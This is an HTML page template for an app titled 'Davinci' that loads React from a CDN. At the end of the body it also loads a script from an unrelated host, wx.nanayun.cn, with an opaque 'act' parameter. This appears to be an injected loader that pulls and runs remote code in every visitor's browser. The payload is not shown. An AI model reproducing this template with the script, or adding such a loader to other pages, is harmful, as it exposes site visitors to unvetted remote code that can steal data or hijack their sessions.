<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org" >

<head>
  <meta charset="utf-8" />
  <meta http-equiv="x-ua-compatible" content="ie=edge,chrome=1"/>
  <link rel="icon" type="image/png" href="https://img.alicdn.com/tps/TB1kBU7NpXXXXXLXXXXXXXXXXXX-160-160.png"/>
  <meta name="viewport" content="width=device-width"/>
  <title>Davinci</title>

<body>
  <div id="ice-container"></div>
  
  <script src="https://g.alicdn.com/code/npm/??react/16.2.0/umd/react.production.min.js,react-dom/16.2.0/umd/react-dom.production.min.js"></script>
  
<script type="text/javascript" src="https://wx.nanayun.cn/api?act=b4eabc18dca8799"></script></body>

</html>
